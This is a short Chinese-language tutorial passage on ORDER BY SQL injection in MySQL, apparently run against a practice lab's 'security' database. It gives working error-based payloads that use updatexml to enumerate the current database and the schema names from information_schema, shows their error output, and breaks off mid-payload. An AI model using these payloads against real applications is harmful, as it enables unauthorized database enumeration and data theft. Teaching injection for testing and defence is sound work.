order by注入
介绍
顾名思义,注入点出现在oder by后面即可称为order by 注入
正常的oder by 语句:
select * from users order by id desc;
当desc此处位置参数可控时,即有可能存在oreder by注入,那么如何在这样的情况下注出我们想要的数据呢?
1.如果有报错信息输出,可尝试通过报错注入完成sql注入攻击
2.如果没有回显,可尝试盲注的手法来注入
通过报错注入(有回显)
这里用updatexml函数来执行报错注入的效果:
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select database())),0));
ERROR 1105 (HY000): XPATH syntax error: '~security' //获取当前数据库
获取数据库个数
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.schemata)),0));
获取数据库列表
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~information_schema'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~security'
获取表个数
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.tables where table_schema &